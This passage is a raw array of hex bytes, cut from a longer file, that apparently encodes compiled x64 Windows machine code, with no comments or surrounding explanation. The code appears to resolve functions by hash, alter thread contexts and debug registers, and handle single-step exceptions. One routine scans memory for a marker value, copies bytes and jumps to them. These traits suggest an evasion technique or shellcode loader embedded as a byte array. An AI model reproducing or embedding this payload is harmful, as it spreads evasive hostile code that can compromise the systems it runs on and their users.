x8B,0x05,0x22,0x52,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x1A,0x52,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x45,0x80,0x48,0x85,0xC0,0x74,0x21,0x48,0x8B,0x5D,0x80,0x48,0x8B,0x05,0xF4,0x51,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xF0,0x51,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x45,0x88,0x48,0x85,0xC0,0x74,0x21,0x48,0x8B,0x5D,0x88,0x48,0x8B,0x05,0xCA,0x51,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xC6,0x51,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x45,0xC0,0x48,0x85,0xC0,0x74,0x21,0x48,0x8B,0x5D,0xC0,0x48,0x8B,0x05,0xA0,0x51,0x01,0x00,0xFF,0xD0,0x49,0x89,0xD8,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x9C,0x51,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x85,0x68,0xFF,0xFF,0xFF,0x48,0x85,0xC0,0x74,0x0F,0x48,0x8B,0x85,0x68,0xFF,0xFF,0xFF,0x48,0x89,0xC1,0xE8,0x29,0x06,0x00,0x00,0x8B,0x45,0xFC,0x48,0x81,0xC4,0xC0,0x00,0x00,0x00,0x5B,0x5F,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x60,0x89,0x4D,0x10,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0xC7,0x45,0xF4,0x01,0x00,0x00,0xC0,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0x8B,0x05,0x39,0x51,0x01,0x00,0xFF,0xD0,0x41,0xB8,0x08,0x00,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x2A,0x51,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xE8,0x48,0x8B,0x05,0x15,0x51,0x01,0x00,0xFF,0xD0,0x41,0xB8,0x30,0x00,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x06,0x51,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xE0,0x48,0x8B,0x05,0xF1,0x50,0x01,0x00,0xFF,0xD0,0x41,0xB8,0x10,0x00,0x00,0x00,0xBA,0x08,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xE2,0x50,0x01,0x00,0xFF,0xD0,0x48,0x89,0x45,0xD8,0x48,0x83,0x7D,0xE8,0x00,0x74,0x0E,0x48,0x83,0x7D,0xE0,0x00,0x74,0x07,0x48,0x83,0x7D,0xD8,0x00,0x75,0x0A,0xB8,0x00,0x00,0x00,0x00,0xE9,0x8B,0x01,0x00,0x00,0x48,0x8B,0x45,0xE8,0x48,0xC7,0x00,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xE0,0xC7,0x00,0x30,0x00,0x00,0x00,0x48,0x8B,0x45,0xE0,0x48,0xC7,0x40,0x08,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xE0,0x8B,0x55,0x20,0x89,0x50,0x18,0x48,0x8B,0x45,0xE0,0x48,0xC7,0x40,0x10,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xE0,0x48,0xC7,0x40,0x20,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xE0,0x48,0xC7,0x40,0x28,0x00,0x00,0x00,0x00,0x8B,0x45,0x10,0x48,0x89,0xC2,0x48,0x8B,0x45,0xD8,0x48,0x89,0x10,0x48,0x8B,0x45,0xD8,0x48,0xC7,0x40,0x08,0x00,0x00,0x00,0x00,0x8B,0x4D,0x18,0x48,0x8B,0x55,0xE8,0x48,0x8B,0x45,0xD8,0x48,0x89,0x44,0x24,0x28,0x48,0x8B,0x45,0xE0,0x48,0x89,0x44,0x24,0x20,0x41,0x89,0xC9,0x49,0x89,0xD0,0xBA,0x04,0x00,0x00,0x00,0xB9,0x0F,0x2A,0x9B,0xCD,0xE8,0xBA,0xFB,0xFF,0xFF,0x89,0x45,0xF4,0x48,0x8B,0x45,0xE8,0x48,0x8B,0x00,0x48,0x89,0x45,0xF8,0x83,0x7D,0xF4,0x00,0x79,0x08,0x48,0xC7,0x45,0xF8,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0xE8,0x00,0x74,0x40,0x48,0x8B,0x45,0xE8,0x41,0xB8,0x08,0x00,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x6D,0xBE,0x00,0x00,0x48,0x8B,0x05,0xDE,0x4F,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0xD6,0x4F,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0xE0,0x00,0x74,0x40,0x48,0x8B,0x45,0xE0,0x41,0xB8,0x30,0x00,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x26,0xBE,0x00,0x00,0x48,0x8B,0x05,0x97,0x4F,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xE0,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x8F,0x4F,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0xD8,0x00,0x74,0x40,0x48,0x8B,0x45,0xD8,0x41,0xB8,0x10,0x00,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xDF,0xBD,0x00,0x00,0x48,0x8B,0x05,0x50,0x4F,0x01,0x00,0xFF,0xD0,0x48,0x8B,0x55,0xD8,0x49,0x89,0xD0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x48,0x8B,0x05,0x48,0x4F,0x01,0x00,0xFF,0xD0,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0xF8,0x48,0x83,0xC4,0x60,0x5D,0xC3,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x10,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x4C,0x89,0x4D,0x28,0x8B,0x45,0x20,0xBA,0x01,0x00,0x00,0x00,0x89,0xC1,0xD3,0xE2,0x89,0xD0,0x83,0xE8,0x01,0x89,0xC0,0x48,0x89,0x45,0xF8,0x8B,0x45,0x18,0x48,0x8B,0x55,0xF8,0x89,0xC1,0x48,0xD3,0xE2,0x48,0x89,0xD0,0x48,0xF7,0xD0,0x48,0x23,0x45,0x10,0x48,0x89,0xC2,0x8B,0x45,0x18,0x4C,0x8B,0x45,0x28,0x89,0xC1,0x49,0xD3,0xE0,0x4C,0x89,0xC0,0x48,0x09,0xD0,0x48,0x89,0x45,0x10,0x48,0x8B,0x45,0x10,0x48,0x83,0xC4,0x10,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0x48,0x89,0x4D,0x10,0x89,0x55,0x18,0x83,0x7D,0x18,0x03,0x74,0x4A,0x83,0x7D,0x18,0x03,0x7F,0x51,0x83,0x7D,0x18,0x02,0x74,0x30,0x83,0x7D,0x18,0x02,0x7F,0x45,0x83,0x7D,0x18,0x00,0x74,0x08,0x83,0x7D,0x18,0x01,0x74,0x10,0xEB,0x37,0x48,0x8B,0x45,0x10,0x48,0xC7,0x40,0x48,0x00,0x00,0x00,0x00,0xEB,0x29,0x48,0x8B,0x45,0x10,0x48,0xC7,0x40,0x50,0x00,0x00,0x00,0x00,0xEB,0x1B,0x48,0x8B,0x45,0x10,0x48,0xC7,0x40,0x58,0x00,0x00,0x00,0x00,0xEB,0x0D,0x48,0x8B,0x45,0x10,0x48,0xC7,0x40,0x60,0x00,0x00,0x00,0x00,0x90,0x8B,0x45,0x18,0x8D,0x14,0x00,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x70,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x01,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x0B,0xFF,0xFF,0xFF,0x48,0x8B,0x55,0x10,0x48,0x89,0x42,0x70,0x48,0x8B,0x45,0x10,0x48,0xC7,0x40,0x68,0x00,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0xC7,0x40,0x44,0x00,0x00,0x00,0x00,0x90,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x20,0x48,0x89,0x4D,0x10,0x48,0x89,0x55,0x18,0x44,0x89,0x45,0x20,0x83,0x7D,0x20,0x03,0x74,0x4A,0x83,0x7D,0x20,0x03,0x7F,0x51,0x83,0x7D,0x20,0x02,0x74,0x30,0x83,0x7D,0x20,0x02,0x7F,0x45,0x83,0x7D,0x20,0x00,0x74,0x08,0x83,0x7D,0x20,0x01,0x74,0x10,0xEB,0x37,0x48,0x8B,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0x89,0x50,0x48,0xEB,0x29,0x48,0x8B,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0x89,0x50,0x50,0xEB,0x1B,0x48,0x8B,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0x89,0x50,0x58,0xEB,0x0D,0x48,0x8B,0x55,0x18,0x48,0x8B,0x45,0x10,0x48,0x89,0x50,0x60,0x90,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x70,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x10,0x00,0x00,0x00,0xBA,0x10,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x53,0xFE,0xFF,0xFF,0x48,0x8B,0x55,0x10,0x48,0x89,0x42,0x70,0x8B,0x45,0x20,0x8D,0x14,0x00,0x48,0x8B,0x45,0x10,0x48,0x8B,0x40,0x70,0x41,0xB9,0x01,0x00,0x00,0x00,0x41,0xB8,0x01,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x29,0xFE,0xFF,0xFF,0x48,0x8B,0x55,0x10,0x48,0x89,0x42,0x70,0x48,0x8B,0x45,0x10,0x48,0xC7,0x40,0x68,0x00,0x00,0x00,0x00,0x90,0x48,0x83,0xC4,0x20,0x5D,0xC3,0x48,0x8B,0x01,0x8B,0x00,0x3D,0x04,0x00,0x00,0x80,0x75,0x5A,0x48,0x89,0xC8,0x48,0x8B,0x48,0x08,0x48,0x8B,0x41,0x78,0x4C,0x8B,0x99,0x98,0x00,0x00,0x00,0x49,0xB9,0xBE,0xBA,0xFE,0xCA,0xEF,0xBE,0xAD,0xDE,0x49,0x83,0xC3,0x08,0x4D,0x39,0x0B,0x75,0xF7,0x4D,0x8B,0x5B,0x08,0x49,0x8B,0x0B,0x49,0x8B,0x53,0x08,0x4D,0x8B,0x4B,0x10,0x49,0x8B,0x5B,0x18,0x49,0x8B,0x6B,0x20,0x49,0x8B,0x63,0x28,0x4D,0x8B,0x43,0x30,0x4D,0x31,0xDB,0x46,0x8A,0x14,0x1A,0x47,0x88,0x14,0x19,0x49,0xFF,0xC3,0x49,0x39,0xCB,0x75,0xF0,0x41,0xFF,0xE0,0xB8,0xFF,0xFF,0xFF,0xFF,0xC3,0x90,0x0F,0x0B,0x55,0x57,0x48,0x81,0xEC,0x18,0x05,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0xB0,0x04,0x00,0x00,0x48,0x89,0x95,0xB8,0x04,0x00,0x00,0xC7,0x85,0x8C,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0x88,0x04,0x00,0x00,0x01,0x00,0x00,0xC0,0x48,0xC7,0x85,0x80,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0xA0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x9A,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0x8D,0x45,0xA0,0x41,0xB8,0xD0,0x04,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xD6,0xBA,0x00,0x00,0xC7,0x45,0xD0,0x1F,0x00,0x10,0x00,0x48,0xC7,0x85,0x78,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x28,0xDB,0x00,0x00,0x48,0x89,0xC1,0xE8,0xD5,0x2F,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x1D,0xB1,0x9D,0xA7,0x48,0x89,0xC1,0xE8,0xE3,0x2D,0x00,0x00,0x48,0x89,0x85,0x78,0x04,0x00,0x00,0x48,0x83,0xBD,0x78,0x04,0x00,0x00,0x00,0x0F,0x84,0xA0,0x00,0x00,0x00,0x48,0x8B,0x85,0x78,0x04,0x00,0x00,0x48,0x8D,0x15,0xCC,0xFE,0xFF,0xFF,0xB9,0x01,0x00,0x00,0x00,0xFF,0xD0,0x48,0x89,0x85,0x80,0x04,0x00,0x00,0x48,0x83,0xBD,0x80,0x04,0x00,0x00,0x00,0x74,0x7D,0x48,0x8D,0x45,0xA0,0x48,0x89,0xC2,0x48,0xC7,0xC1,0xFE,0xFF,0xFF,0xFF,0xE8,0x12,0x79,0x00,0x00,0x89,0x85,0x88,0x04,0x00,0x00,0x83,0xBD,0x88,0x04,0x00,0x00,0x00,0x78,0x5E,0x48,0x8B,0x95,0xB0,0x04,0x00,0x00,0x48,0x8D,0x45,0xA0,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xA2,0xFD,0xFF,0xFF,0x48,0x8D,0x45,0xA0,0x48,0x89,0xC2,0x48,0xC7,0xC1,0xFE,0xFF,0xFF,0xFF,0xE8,0x31,0x79,0x00,0x00,0x89,0x85,0x88,0x04,0x00,0x00,0x83,0xBD,0x88,0x04,0x00,0x00,0x00,0x78,0x26,0x48,0x8B,0x85,0xB8,0x04,0x00,0x00,0x48,0x8B,0x95,0x80,0x04,0x00,0x00,0x48,0x89,0x10,0xC7,0x85,0x8C,0x04,0x00,0x00,0x01,0x00,0x00,0x00,0xEB,0x0A,0x90,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x85,0x8C,0x04,0x00,0x00,0x48,0x81,0xC4,0x18,0x05,0x00,0x00,0x5F,0x5D,0xC3,0x55,0x57,0x48,0x81,0xEC,0x08,0x05,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0xA0,0x04,0x00,0x00,0xC7,0x85,0x7C,0x04,0x00,0x00,0x01,0x00,0x00,0xC0,0x48,0x8D,0x55,0xA0,0xB8,0x00,0x00,0x00,0x00,0xB9,0x9A,0x00,0x00,0x00,0x48,0x89,0xD7,0xF3,0x48,0xAB,0x48,0x8D,0x45,0xA0,0x41,0xB8,0xD0,0x04,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x81,0xB9,0x00,0x00,0xC7,0x45,0xD0,0x1F,0x00,0x10,0x00,0xC7,0x85,0x78,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x70,0x04,0x00,0x00,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xC9,0xD9,0x00,0x00,0x48,0x89,0xC1,0xE8,0x76,0x2E,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0xA3,0x0E,0x38,0x24,0x48,0x89,0xC1,0xE8,0x84,0x2C,0x00,0x00,0x48,0x89,0x85,0x70,0x04,0x00,0x00,0x48,0x83,0xBD,0x70,0x04,0x00,0x00,0x00,0x74,0x77,0x48,0x8D,0x45,0xA0,0x48,0x89,0xC2,0x48,0xC7,0xC1,0xFE,0xFF,0xFF,0xFF,0xE8,0xDD,0x77,0x00,0x00,0x89,0x85,0x7C,0x04,0x00,0x00,0x83,0xBD,0x7C,0x04,0x00,0x00,0x00,0x78,0x58,0x48,0x8D,0x45,0xA0,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xC1,0xFB,0xFF,0xFF,0x48,0x8D,0x45,0xA0,0x48,0x89,0xC2,0x48,0xC7,0xC1,0xFE,0xFF,0xFF,0xFF,0xE8,0x04,0x78,0x00,0x00,0x89,0x85,0x7C,0x04,0x00,0x00,0x83,0xBD,0x7C,0x04,0x00,0x00,0x00,0x78,0x28,0x48,0x8B,0x85,0xA0,0x04,0x00,0x00,0x48,0x8B,0x95,0x70,0x04,0x00,0x00,0x48,0x89,0xC1,0xFF,0xD2,0x89,0x85,0x78,0x04,0x00,0x00,0x83,0xBD,0x78,0x04,0x00,0x00,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x90,0x48,0x81,0xC4,0x08,0x05,0x00,0x00,0x5F,0x5D,0xC3,0x90,0x90,0x90,0x90,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x30,0x48,0x89,0x4D,0x10,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x01,0x00,0x00,0xC0,0x48,0x83,0x7D,0x10,0x00,0x74,0x15,0x48,0x8B,0x45,0x10,0x48,0x89,0xC1,0xE8,0x83,0x75,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x78,0x09,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x01,0x90,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x30,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x81,0xEC,0xB0,0x00,0x00,0x00,0x48,0x89,0x4D,0x10,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x01,0x00,0x00,0xC0,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xA0,0x0F,0x11,0x45,0xB0,0x0F,0x11,0x45,0xC0,0xC7,0x45,0x9C,0x00,0x00,0x00,0x00,0x48,0x83,0x7D,0x10,0x00,0x0F,0x84,0xE6,0x00,0x00,0x00,0x48,0x8D,0x05,0x81,0xD8,0x00,0x00,0x48,0x89,0x45,0xE8,0x66,0xC7,0x45,0xE0,0xA0,0x00,0x66,0xC7,0x45,0xE2,0xA2,0x00,0xC7,0x45,0xA0,0x30,0x00,0x00,0x00,0x48,0xC7,0x45,0xA8,0x00,0x00,0x00,0x00,0xC7,0x45,0xB8,0x40,0x00,0x00,0x00,0x48,0x8D,0x45,0xE0,0x48,0x89,0x45,0xB0,0x48,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0xA0,0x48,0x8B,0x45,0x10,0x48,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x01,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x00,0x00,0x00,0x00,0x49,0x89,0xD0,0xBA,0x3F,0x00,0x0F,0x00,0x48,0x89,0xC1,0xE8,0xCA,0x71,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x78,0x63,0x48,0x8D,0x05,0x9D,0xD8,0x00,0x00,0x48,0x89,0x45,0xD8,0x66,0xC7,0x45,0xD0,0x10,0x00,0x66,0xC7,0x45,0xD2,0x12,0x00,0xC7,0x45,0x9C,0x02,0x00,0x00,0x00,0x48,0x8B,0x45,0x10,0x48,0x8B,0x00,0x48,0x8D,0x55,0xD0,0xC7,0x44,0x24,0x28,0x04,0x00,0x00,0x00,0x48,0x8D,0x4D,0x9C,0x48,0x89,0x4C,0x24,0x20,0x41,0xB9,0x04,0x00,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xCD,0x71,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x78,0x0F,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x07,0x90,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xFC,0x48,0x81,0xC4,0xB0,0x00,0x00,0x00,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xEC,0x70,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x01,0x00,0x00,0xC0,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xC0,0x0F,0x11,0x45,0xD0,0x0F,0x11,0x45,0xE0,0x48,0xC7,0x45,0xB0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xB8,0x00,0x00,0x00,0x00,0x48,0x8D,0x05,0x02,0xD8,0x00,0x00,0x48,0x89,0x45,0xB8,0x66,0xC7,0x45,0xB0,0x46,0x00,0x66,0xC7,0x45,0xB2,0x48,0x00,0x48,0x8D,0x45,0xB0,0x48,0x89,0x45,0xD0,0xC7,0x45,0xC0,0x30,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0xC7,0x45,0xD8,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0x48,0x8D,0x55,0xC0,0x48,0x8D,0x45,0xF0,0x49,0x89,0xD0,0xBA,0x01,0x00,0x10,0x00,0x48,0x89,0xC1,0xE8,0x15,0x72,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x78,0x29,0x48,0x8B,0x45,0xF0,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x11,0x6B,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x78,0x0C,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x48,0x8B,0x45,0xF0,0x48,0x85,0xC0,0x74,0x0C,0x48,0x8B,0x45,0xF0,0x48,0x89,0xC1,0xE8,0x6F,0x66,0x00,0x00,0x8B,0x45,0xFC,0x48,0x83,0xC4,0x70,0x5D,0xC3,0x55,0x48,0x89,0xE5,0x48,0x83,0xC4,0x80,0xC7,0x45,0xFC,0x00,0x00,0x00,0x00,0xC7,0x45,0xF8,0x01,0x00,0x00,0xC0,0x48,0xC7,0x45,0xF0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0x6E,0xD7,0x00,0x00,0x48,0x89,0xC1,0xE8,0xFB,0x2A,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0xFE,0xF2,0xC3,0x6C,0x48,0x89,0xC1,0xE8,0x09,0x29,0x00,0x00,0x48,0x89,0x45,0xF0,0x48,0x83,0x7D,0xF0,0x00,0x74,0x56,0x48,0xB8,0x75,0x08,0xBC,0xA3,0x3A,0x0B,0x94,0x41,0x48,0x89,0x45,0xE0,0x48,0x8D,0x45,0xE0,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x20,0x00,0x00,0x00,0x00,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xCB,0x70,0x00,0x00,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x0F,0x89,0xA6,0x00,0x00,0x00,0xE9,0xAE,0x00,0x00,0x00,0xBA,0x01,0x00,0x00,0x00,0x48,0x8D,0x05,0xE6,0xD6,0x00,0x00,0x48,0x89,0xC1,0xE8,0x73,0x2A,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0xBA,0x99,0xF8,0x0F,0x98,0x48,0x89,0xC1,0xE8,0x81,0x28,0x00,0x00,0x48,0x89,0x45,0xE8,0x48,0x83,0x7D,0xE8,0x00,0x74,0x78,0xC7,0x45,0xD0,0xD8,0xEA,0x6E,0xE4,0x66,0xC7,0x45,0xD4,0x54,0x0C,0x66,0xC7,0x45,0xD6,0x89,0x44,0x48,0xB8,0x98,0x98,0x8F,0xA7,0x9D,0x05,0x9E,0x0E,0x48,0x89,0x45,0xD8,0x48,0xC7,0x45,0xC0,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0xC8,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0xC0,0x41,0xB8,0x10,0x00,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0xE8,0xB4,0x00,0x00,0x48,0x8D,0x55,0xC0,0x48,0x8D,0x45,0xD0,0x4C,0x8B,0x55,0xE8,0x41,0xB9,0x00,0x00,0x00,0x00,0x41,0xB8,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0x41,0xFF,0xD2,0x89,0x45,0xF8,0x83,0x7D,0xF8,0x00,0x78,0x0C,0xC7,0x45,0xFC,0x01,0x00,0x00,0x00,0xEB,0x04,0x90,0xEB,0x01,0x90,0x8B,0x45,0xFC,0x48,0x83,0xEC,0x80,0x5D,0xC3,0x55,0x48,0x81,0xEC,0x20,0x01,0x00,0x00,0x48,0x8D,0xAC,0x24,0x80,0x00,0x00,0x00,0x48,0x89,0x8D,0xB0,0x00,0x00,0x00,0x48,0x89,0x95,0xB8,0x00,0x00,0x00,0xC7,0x85,0x9C,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0xC7,0x85,0x98,0x00,0x00,0x00,0x01,0x00,0x00,0xC0,0x48,0xC7,0x85,0x80,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x85,0x88,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x78,0x00,0x00,0x00,0x00,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0x40,0x0F,0x11,0x45,0x50,0x0F,0x11,0x45,0x60,0x66,0x0F,0xEF,0xC0,0x0F,0x11,0x45,0xF0,0x0F,0x11,0x45,0x00,0x0F,0x11,0x45,0x10,0x0F,0x11,0x45,0x20,0x66,0x0F,0xD6,0x45,0x30,0x48,0xC7,0x45,0xE8,0x00,0x00,0x00,0x00,0xE8,0x15,0xFE,0xFF,0xFF,0x89,0x85,0x98,0x00,0x00,0x00,0x83,0xBD,0x98,0x00,0x00,0x00,0x00,0x0F,0x88,0x85,0x01,0x00,0x00,0xE8,0x0E,0xFD,0xFF,0xFF,0x89,0x85,0x98,0x00,0x00,0x00,0x83,0xBD,0x98,0x00,0x00,0x00,0x00,0x0F,0x88,0x70,0x01,0x00,0x00,0x48,0x8D,0x05,0x9B,0xD5,0x00,0x00,0x48,0x89,0x85,0x88,0x00,0x00,0x00,0x66,0xC7,0x85,0x80,0x00,0x00,0x00,0x42,0x00,0x66,0xC7,0x85,0x82,0x00,0x00,0x00,0x44,0x00,0xC7,0x45,0x40,0x30,0x00,0x00,0x00,0x48,0xC7,0x45,0x48,0x00,0x00,0x00,0x00,0xC7,0x45,0x58,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x50,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x60,0x00,0x00,0x00,0x00,0x48,0xC7,0x45,0x68,0x00,0x00,0x00,0x00,0x48,0x8D,0x45,0xF0,0x41,0xB8,0x48,0x00,0x00,0x00,0xBA,0x00,0x00,0x00,0x00,0x48,0x89,0xC1,0xE8,0x95,0xB3,0x00,0x00,0x48,0xC7,0x45,0x00,0x78,0x05,0x00,0x00,0x4C,0x8D,0x45,0xF0,0x48,0x8D,0x4D,0x40,0x48,0x8D,0x95,0x80,0x00,0x00,0x00,0x48,0x8D,0x45,0x78,0x48,0xC7,0x44,0x24,0x50,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x48,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x40,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x38,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x30,0x00,0x00,0x00,0x00,0x48,0xC7,0x44,0x24,0x28,0x00,0x00,0x00,0x00,0xC7,0x44,0x24,0x20,0x00,0x00,0x02,0x00,0x4D,0x89,0xC1,0x49,0x89,0xC8,0x48,0x89,0xC1,0xE8,0x36,0x6F,0x00,0x00,0x89,0x85,0x98,0x00,0x00,0x00,0x83,0xBD,0x98,0x00,0x00,0x00,0x00,0x0F,0x88,0x94,0x00,0x00,0x